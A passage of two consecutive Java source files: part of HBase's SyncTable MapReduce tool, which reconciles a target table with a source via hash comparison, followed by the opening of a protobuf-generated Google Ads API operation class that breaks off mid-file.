jobConf.setBoolean(DO_DELETES_CONF_KEY, doDeletes); jobConf.setBoolean(DO_PUTS_CONF_KEY, doPuts); jobConf.setBoolean(IGNORE_TIMESTAMPS, ignoreTimestamps); TableMapReduceUtil.initTableMapperJob(targetTableName, tableHash.initScan(), SyncMapper.class, null, null, job); job.setNumReduceTasks(0); if (dryRun) { job.setOutputFormatClass(NullOutputFormat.class); } else { // No reducers. Just write straight to table. Call initTableReducerJob // because it sets up the TableOutputFormat. if (targetUri != null) { TableMapReduceUtil.initTableReducerJob(targetTableName, null, job, null, targetUri); } else { TableMapReduceUtil.initTableReducerJob(targetTableName, null, job, null, targetZkCluster); } // would be nice to add an option for bulk load instead } return job; } public static class SyncMapper extends TableMapper<ImmutableBytesWritable, Mutation> { Path sourceHashDir; Connection sourceConnection; Connection targetConnection; Table sourceTable; Table targetTable; boolean dryRun; boolean doDeletes = true; boolean doPuts = true; boolean ignoreTimestamp; HashTable.TableHash sourceTableHash; HashTable.TableHash.Reader sourceHashReader; ImmutableBytesWritable currentSourceHash; ImmutableBytesWritable nextSourceKey; HashTable.ResultHasher targetHasher; Throwable mapperException; public static enum Counter { BATCHES, HASHES_MATCHED, HASHES_NOT_MATCHED, SOURCEMISSINGROWS, SOURCEMISSINGCELLS, TARGETMISSINGROWS, TARGETMISSINGCELLS, ROWSWITHDIFFS, DIFFERENTCELLVALUES, MATCHINGROWS, MATCHINGCELLS, EMPTY_BATCHES, RANGESMATCHED, RANGESNOTMATCHED } @Override protected void setup(Context context) throws IOException { Configuration conf = context.getConfiguration(); sourceHashDir = new Path(conf.get(SOURCE_HASH_DIR_CONF_KEY)); sourceConnection = openConnection(conf, SOURCE_URI_CONF_KEY, SOURCE_ZK_CLUSTER_CONF_KEY, null); targetConnection = openConnection(conf, TARGET_URI_CONF_KEY, TARGET_ZK_CLUSTER_CONF_KEY, TableOutputFormat.OUTPUT_CONF_PREFIX); sourceTable = openTable(sourceConnection, 
conf, SOURCE_TABLE_CONF_KEY); targetTable = openTable(targetConnection, conf, TARGET_TABLE_CONF_KEY); dryRun = conf.getBoolean(DRY_RUN_CONF_KEY, false); doDeletes = conf.getBoolean(DO_DELETES_CONF_KEY, true); doPuts = conf.getBoolean(DO_PUTS_CONF_KEY, true); ignoreTimestamp = conf.getBoolean(IGNORE_TIMESTAMPS, false); sourceTableHash = HashTable.TableHash.read(conf, sourceHashDir); LOG.info("Read source hash manifest: " + sourceTableHash); LOG.info("Read " + sourceTableHash.partitions.size() + " partition keys"); TableSplit split = (TableSplit) context.getInputSplit(); ImmutableBytesWritable splitStartKey = new ImmutableBytesWritable(split.getStartRow()); sourceHashReader = sourceTableHash.newReader(conf, splitStartKey); findNextKeyHashPair(); // create a hasher, but don't start it right away // instead, find the first hash batch at or after the start row // and skip any rows that come before. they will be caught by the previous task targetHasher = new HashTable.ResultHasher(); targetHasher.ignoreTimestamps = ignoreTimestamp; } private static Connection openConnection(Configuration conf, String uriConfKey, String zkClusterConfKey, String configPrefix) throws IOException { String uri = conf.get(uriConfKey); if (!StringUtils.isBlank(uri)) { try { return ConnectionFactory.createConnection(new URI(uri), conf); } catch (URISyntaxException e) { throw new IOException( "malformed connection uri: " + uri + ", please check config " + uriConfKey, e); } } else { String zkCluster = conf.get(zkClusterConfKey); Configuration clusterConf = HBaseConfiguration.createClusterConf(conf, zkCluster, configPrefix); return ConnectionFactory.createConnection(clusterConf); } } private static Table openTable(Connection connection, Configuration conf, String tableNameConfKey) throws IOException { return connection.getTable(TableName.valueOf(conf.get(tableNameConfKey))); } /** * Attempt to read the next source key/hash pair. 
If there are no more, set nextSourceKey to * null */ private void findNextKeyHashPair() throws IOException { boolean hasNext = sourceHashReader.next(); if (hasNext) { nextSourceKey = sourceHashReader.getCurrentKey(); } else { // no more keys - last hash goes to the end nextSourceKey = null; } } @Override protected void map(ImmutableBytesWritable key, Result value, Context context) throws IOException, InterruptedException { try { // first, finish any hash batches that end before the scanned row while (nextSourceKey != null && key.compareTo(nextSourceKey) >= 0) { moveToNextBatch(context); } // next, add the scanned row (as long as we've reached the first batch) if (targetHasher.isBatchStarted()) { targetHasher.hashResult(value); } } catch (Throwable t) { mapperException = t; throw t; } } /** * If there is an open hash batch, complete it and sync if there are diffs. Start a new batch, * and seek to read the */ private void moveToNextBatch(Context context) throws IOException, InterruptedException { if (targetHasher.isBatchStarted()) { finishBatchAndCompareHashes(context); } targetHasher.startBatch(nextSourceKey); currentSourceHash = sourceHashReader.getCurrentHash(); findNextKeyHashPair(); } /** * Finish the currently open hash batch. Compare the target hash to the given source hash. If * they do not match, then sync the covered key range. */ private void finishBatchAndCompareHashes(Context context) throws IOException, InterruptedException { targetHasher.finishBatch(); context.getCounter(Counter.BATCHES).increment(1); if (targetHasher.getBatchSize() == 0) { context.getCounter(Counter.EMPTY_BATCHES).increment(1); } ImmutableBytesWritable targetHash = targetHasher.getBatchHash(); if (targetHash.equals(currentSourceHash)) { context.getCounter(Counter.HASHES_MATCHED).increment(1); } else { context.getCounter(Counter.HASHES_NOT_MATCHED).increment(1); ImmutableBytesWritable stopRow = nextSourceKey == null ? 
new ImmutableBytesWritable(sourceTableHash.stopRow) : nextSourceKey; if (LOG.isDebugEnabled()) { LOG.debug("Hash mismatch. Key range: " + toHex(targetHasher.getBatchStartKey()) + " to " + toHex(stopRow) + " sourceHash: " + toHex(currentSourceHash) + " targetHash: " + toHex(targetHash)); } syncRange(context, targetHasher.getBatchStartKey(), stopRow); } } private static String toHex(ImmutableBytesWritable bytes) { return Bytes.toHex(bytes.get(), bytes.getOffset(), bytes.getLength()); } private static final CellScanner EMPTY_CELL_SCANNER = new CellScanner(Collections.<Result> emptyIterator()); /** * Rescan the given range directly from the source and target tables. Count and log differences, * and if this is not a dry run, output Puts and Deletes to make the target table match the * source table for this range */ private void syncRange(Context context, ImmutableBytesWritable startRow, ImmutableBytesWritable stopRow) throws IOException, InterruptedException { Scan scan = sourceTableHash.initScan(); scan.withStartRow(startRow.copyBytes()); scan.withStopRow(stopRow.copyBytes()); ResultScanner sourceScanner = sourceTable.getScanner(scan); CellScanner sourceCells = new CellScanner(sourceScanner.iterator()); ResultScanner targetScanner = targetTable.getScanner(new Scan(scan)); CellScanner targetCells = new CellScanner(targetScanner.iterator()); boolean rangeMatched = true; byte[] nextSourceRow = sourceCells.nextRow(); byte[] nextTargetRow = targetCells.nextRow(); while (nextSourceRow != null || nextTargetRow != null) { boolean rowMatched; int rowComparison = compareRowKeys(nextSourceRow, nextTargetRow); if (rowComparison < 0) { if (LOG.isDebugEnabled()) { LOG.debug("Target missing row: " + Bytes.toString(nextSourceRow)); } context.getCounter(Counter.TARGETMISSINGROWS).increment(1); rowMatched = syncRowCells(context, nextSourceRow, sourceCells, EMPTY_CELL_SCANNER); nextSourceRow = sourceCells.nextRow(); // advance only source to next row } else if (rowComparison > 0) { if 
(LOG.isDebugEnabled()) { LOG.debug("Source missing row: " + Bytes.toString(nextTargetRow)); } context.getCounter(Counter.SOURCEMISSINGROWS).increment(1); rowMatched = syncRowCells(context, nextTargetRow, EMPTY_CELL_SCANNER, targetCells); nextTargetRow = targetCells.nextRow(); // advance only target to next row } else { // current row is the same on both sides, compare cell by cell rowMatched = syncRowCells(context, nextSourceRow, sourceCells, targetCells); nextSourceRow = sourceCells.nextRow(); nextTargetRow = targetCells.nextRow(); } if (!rowMatched) { rangeMatched = false; } } sourceScanner.close(); targetScanner.close(); context.getCounter(rangeMatched ? Counter.RANGESMATCHED : Counter.RANGESNOTMATCHED) .increment(1); } private static class CellScanner { private final Iterator<Result> results; private byte[] currentRow; private Result currentRowResult; private int nextCellInRow; private Result nextRowResult; public CellScanner(Iterator<Result> results) { this.results = results; } /** * Advance to the next row and return its row key. Returns null iff there are no more rows. */ public byte[] nextRow() { if (nextRowResult == null) { // no cached row - check scanner for more while (results.hasNext()) { nextRowResult = results.next(); Cell nextCell = nextRowResult.rawCells()[0]; if ( currentRow == null || !Bytes.equals(currentRow, 0, currentRow.length, nextCell.getRowArray(), nextCell.getRowOffset(), nextCell.getRowLength()) ) { // found next row break; } else { // found another result from current row, keep scanning nextRowResult = null; } } if (nextRowResult == null) { // end of data, no more rows currentRowResult = null; currentRow = null; return null; } } // advance to cached result for next row currentRowResult = nextRowResult; nextCellInRow = 0; currentRow = currentRowResult.getRow(); nextRowResult = null; return currentRow; } /** * Returns the next Cell in the current row or null iff none remain. 
*/ public Cell nextCellInRow() { if (currentRowResult == null) { // nothing left in current row return null; } Cell nextCell = currentRowResult.rawCells()[nextCellInRow]; nextCellInRow++; if (nextCellInRow == currentRowResult.size()) { if (results.hasNext()) { Result result = results.next(); Cell cell = result.rawCells()[0]; if ( Bytes.equals(currentRow, 0, currentRow.length, cell.getRowArray(), cell.getRowOffset(), cell.getRowLength()) ) { // result is part of current row currentRowResult = result; nextCellInRow = 0; } else { // result is part of next row, cache it nextRowResult = result; // current row is complete currentRowResult = null; } } else { // end of data currentRowResult = null; } } return nextCell; } } private Cell checkAndResetTimestamp(Cell sourceCell) { if (ignoreTimestamp) { sourceCell = CellBuilderFactory.create(CellBuilderType.SHALLOW_COPY).setType(sourceCell.getType()) .setRow(sourceCell.getRowArray(), sourceCell.getRowOffset(), sourceCell.getRowLength()) .setFamily(sourceCell.getFamilyArray(), sourceCell.getFamilyOffset(), sourceCell.getFamilyLength()) .setQualifier(sourceCell.getQualifierArray(), sourceCell.getQualifierOffset(), sourceCell.getQualifierLength()) .setTimestamp(EnvironmentEdgeManager.currentTime()).setValue(sourceCell.getValueArray(), sourceCell.getValueOffset(), sourceCell.getValueLength()) .build(); } return sourceCell; } /** * Compare the cells for the given row from the source and target tables. Count and log any * differences. If not a dry run, output a Put and/or Delete needed to sync the target table to * match the source table. 
*/ private boolean syncRowCells(Context context, byte[] rowKey, CellScanner sourceCells, CellScanner targetCells) throws IOException, InterruptedException { Put put = null; Delete delete = null; long matchingCells = 0; boolean matchingRow = true; Cell sourceCell = sourceCells.nextCellInRow(); Cell targetCell = targetCells.nextCellInRow(); while (sourceCell != null || targetCell != null) { int cellKeyComparison = compareCellKeysWithinRow(sourceCell, targetCell); if (cellKeyComparison < 0) { if (LOG.isDebugEnabled()) { LOG.debug("Target missing cell: " + sourceCell); } context.getCounter(Counter.TARGETMISSINGCELLS).increment(1); matchingRow = false; if (!dryRun && doPuts) { if (put == null) { put = new Put(rowKey); } sourceCell = checkAndResetTimestamp(sourceCell); put.add(sourceCell); } sourceCell = sourceCells.nextCellInRow(); } else if (cellKeyComparison > 0) { if (LOG.isDebugEnabled()) { LOG.debug("Source missing cell: " + targetCell); } context.getCounter(Counter.SOURCEMISSINGCELLS).increment(1); matchingRow = false; if (!dryRun && doDeletes) { if (delete == null) { delete = new Delete(rowKey); } // add a tombstone to exactly match the target cell that is missing on the source delete.addColumn(CellUtil.cloneFamily(targetCell), CellUtil.cloneQualifier(targetCell), targetCell.getTimestamp()); } targetCell = targetCells.nextCellInRow(); } else { // the cell keys are equal, now check values if (CellUtil.matchingValue(sourceCell, targetCell)) { matchingCells++; } else { if (LOG.isDebugEnabled()) { LOG.debug("Different values: "); LOG.debug(" source cell: " + sourceCell + " value: " + Bytes.toString(sourceCell.getValueArray(), sourceCell.getValueOffset(), sourceCell.getValueLength())); LOG.debug(" target cell: " + targetCell + " value: " + Bytes.toString(targetCell.getValueArray(), targetCell.getValueOffset(), targetCell.getValueLength())); } context.getCounter(Counter.DIFFERENTCELLVALUES).increment(1); matchingRow = false; if (!dryRun && doPuts) { // overwrite target 
cell if (put == null) { put = new Put(rowKey); } sourceCell = checkAndResetTimestamp(sourceCell); put.add(sourceCell); } } sourceCell = sourceCells.nextCellInRow(); targetCell = targetCells.nextCellInRow(); } if (!dryRun && sourceTableHash.scanBatch > 0) { if (put != null && put.size() >= sourceTableHash.scanBatch) { context.write(new ImmutableBytesWritable(rowKey), put); put = null; } if (delete != null && delete.size() >= sourceTableHash.scanBatch) { context.write(new ImmutableBytesWritable(rowKey), delete); delete = null; } } } if (!dryRun) { if (put != null) { context.write(new ImmutableBytesWritable(rowKey), put); } if (delete != null) { context.write(new ImmutableBytesWritable(rowKey), delete); } } if (matchingCells > 0) { context.getCounter(Counter.MATCHINGCELLS).increment(matchingCells); } if (matchingRow) { context.getCounter(Counter.MATCHINGROWS).increment(1); return true; } else { context.getCounter(Counter.ROWSWITHDIFFS).increment(1); return false; } } /** * Compare row keys of the given Result objects. Nulls are after non-nulls */ private static int compareRowKeys(byte[] r1, byte[] r2) { if (r1 == null) { return 1; // source missing row } else if (r2 == null) { return -1; // target missing row } else { // Sync on no META tables only. We can directly do what CellComparator is doing inside. // Never the call going to MetaCellComparator. return Bytes.compareTo(r1, 0, r1.length, r2, 0, r2.length); } } /** * Compare families, qualifiers, and timestamps of the given Cells. They are assumed to be of * the same row. Nulls are after non-nulls. 
*/ private int compareCellKeysWithinRow(Cell c1, Cell c2) { if (c1 == null) { return 1; // source missing cell } if (c2 == null) { return -1; // target missing cell } int result = CellComparator.getInstance().compareFamilies(c1, c2); if (result != 0) { return result; } result = CellComparator.getInstance().compareQualifiers(c1, c2); if (result != 0) { return result; } if (this.ignoreTimestamp) { return 0; } else { // note timestamp comparison is inverted - more recent cells first return CellComparator.getInstance().compareTimestamps(c1, c2); } } @Override protected void cleanup(Context context) throws IOException, InterruptedException { if (mapperException == null) { try { finishRemainingHashRanges(context); } catch (Throwable t) { mapperException = t; } } try { sourceTable.close(); targetTable.close(); sourceConnection.close(); targetConnection.close(); } catch (Throwable t) { if (mapperException == null) { mapperException = t; } else { LOG.error("Suppressing exception from closing tables", t); } } // propagate first exception if (mapperException != null) { Throwables.throwIfInstanceOf(mapperException, IOException.class); Throwables.throwIfInstanceOf(mapperException, InterruptedException.class); Throwables.throwIfUnchecked(mapperException); } } private void finishRemainingHashRanges(Context context) throws IOException, InterruptedException { TableSplit split = (TableSplit) context.getInputSplit(); byte[] splitEndRow = split.getEndRow(); boolean reachedEndOfTable = HashTable.isTableEndRow(splitEndRow); // if there are more hash batches that begin before the end of this split move to them while ( nextSourceKey != null && (nextSourceKey.compareTo(splitEndRow) < 0 || reachedEndOfTable) ) { moveToNextBatch(context); } if (targetHasher.isBatchStarted()) { // need to complete the final open hash batch if ( (nextSourceKey != null && nextSourceKey.compareTo(splitEndRow) > 0) || (nextSourceKey == null && !Bytes.equals(splitEndRow, sourceTableHash.stopRow)) ) { // the open 
hash range continues past the end of this region // add a scan to complete the current hash range Scan scan = sourceTableHash.initScan(); scan.withStartRow(splitEndRow); if (nextSourceKey == null) { scan.withStopRow(sourceTableHash.stopRow); } else { scan.withStopRow(nextSourceKey.copyBytes()); } ResultScanner targetScanner = null; try { targetScanner = targetTable.getScanner(scan); for (Result row : targetScanner) { targetHasher.hashResult(row); } } finally { if (targetScanner != null) { targetScanner.close(); } } } // else current batch ends exactly at split end row finishBatchAndCompareHashes(context); } } } private static final int NUM_ARGS = 3; private static void printUsage(final String errorMsg) { if (errorMsg != null && errorMsg.length() > 0) { System.err.println("ERROR: " + errorMsg); System.err.println(); } System.err.println("Usage: SyncTable [options] <sourcehashdir> <sourcetable> <targettable>"); System.err.println(); System.err.println("Options:"); System.err.println(" sourceuri Cluster connection uri of the source table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" sourcezkcluster ZK cluster key of the source table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" Do not take effect if sourceuri is specified"); System.err.println(" Deprecated, please use sourceuri instead"); System.err.println(" targeturi Cluster connection uri of the target table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" targetzkcluster ZK cluster key of the target table"); System.err.println(" (defaults to cluster in classpath's config)"); System.err.println(" Do not take effect if targeturi is specified"); System.err.println(" Deprecated, please use targeturi instead"); System.err.println(" dryrun if true, output counters but no writes"); System.err.println(" (defaults to false)"); System.err.println(" doDeletes if false, does not perform 
deletes"); System.err.println(" (defaults to true)"); System.err.println(" doPuts if false, does not perform puts"); System.err.println(" (defaults to true)"); System.err.println(" ignoreTimestamps if true, ignores cells timestamps while comparing "); System.err.println(" cell values. Any missing cell on target then gets"); System.err.println(" added with current time as timestamp "); System.err.println(" (defaults to false)"); System.err.println(); System.err.println("Args:"); System.err.println(" sourcehashdir path to HashTable output dir for source table"); System.err.println(" (see org.apache.hadoop.hbase.mapreduce.HashTable)"); System.err.println(" sourcetable Name of the source table to sync from"); System.err.println(" targettable Name of the target table to sync to"); System.err.println(); System.err.println("Examples:"); System.err.println(" For a dry run SyncTable of tableA from a remote source cluster"); System.err.println(" to a local target cluster:"); System.err.println(" $ hbase " + "org.apache.hadoop.hbase.mapreduce.SyncTable --dryrun=true" + " --sourcezkcluster=zk1.example.com,zk2.example.com,zk3.example.com:2181:/hbase" + " hdfs://nn:9000/hashes/tableA tableA tableA"); } private boolean doCommandLine(final String[] args) { if (args.length < NUM_ARGS) { printUsage(null); return false; } try { sourceHashDir = new Path(args[args.length - 3]); sourceTableName = args[args.length - 2]; targetTableName = args[args.length - 1]; for (int i = 0; i < args.length - NUM_ARGS; i++) { String cmd = args[i]; if (cmd.equals("-h") || cmd.startsWith("--h")) { printUsage(null); return false; } final String sourceUriKey = "--sourceuri="; if (cmd.startsWith(sourceUriKey)) { sourceUri = new URI(cmd.substring(sourceUriKey.length())); continue; } final String sourceZkClusterKey = "--sourcezkcluster="; if (cmd.startsWith(sourceZkClusterKey)) { sourceZkCluster = cmd.substring(sourceZkClusterKey.length()); continue; } final String targetUriKey = "--targeturi="; if 
(cmd.startsWith(targetUriKey)) { targetUri = new URI(cmd.substring(targetUriKey.length())); continue; } final String targetZkClusterKey = "--targetzkcluster="; if (cmd.startsWith(targetZkClusterKey)) { targetZkCluster = cmd.substring(targetZkClusterKey.length()); continue; } final String dryRunKey = "--dryrun="; if (cmd.startsWith(dryRunKey)) { dryRun = Boolean.parseBoolean(cmd.substring(dryRunKey.length())); continue; } final String doDeletesKey = "--doDeletes="; if (cmd.startsWith(doDeletesKey)) { doDeletes = Boolean.parseBoolean(cmd.substring(doDeletesKey.length())); continue; } final String doPutsKey = "--doPuts="; if (cmd.startsWith(doPutsKey)) { doPuts = Boolean.parseBoolean(cmd.substring(doPutsKey.length())); continue; } final String ignoreTimestampsKey = "--ignoreTimestamps="; if (cmd.startsWith(ignoreTimestampsKey)) { ignoreTimestamps = Boolean.parseBoolean(cmd.substring(ignoreTimestampsKey.length())); continue; } printUsage("Invalid argument '" + cmd + "'"); return false; } } catch (Exception e) { LOG.error("Failed to parse commandLine arguments", e); printUsage("Can't start because " + e.getMessage()); return false; } return true; } /** * Main entry point. */ public static void main(String[] args) throws Exception { int ret = ToolRunner.run(new SyncTable(HBaseConfiguration.create()), args); System.exit(ret); } @Override public int run(String[] args) throws Exception { String[] otherArgs = new GenericOptionsParser(getConf(), args).getRemainingArgs(); if (!doCommandLine(otherArgs)) { return 1; } Job job = createSubmittableJob(otherArgs); if (!job.waitForCompletion(true)) { LOG.info("Map-reduce job failed!"); return 1; } counters = job.getCounters(); return 0; } }
googleads/google-ads-java
35,941
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/CampaignConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/campaign_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CampaignConversionGoalOperation} */ public final class CampaignConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.CampaignConversionGoalOperation) CampaignConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignConversionGoalOperation.newBuilder() to construct. private CampaignConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; 
public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? 
com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.CampaignConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v19.services.CampaignConversionGoalOperation other = (com.google.ads.googleads.v19.services.CampaignConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return 
false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream 
input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CampaignConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.CampaignConversionGoalOperation) com.google.ads.googleads.v19.services.CampaignConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( 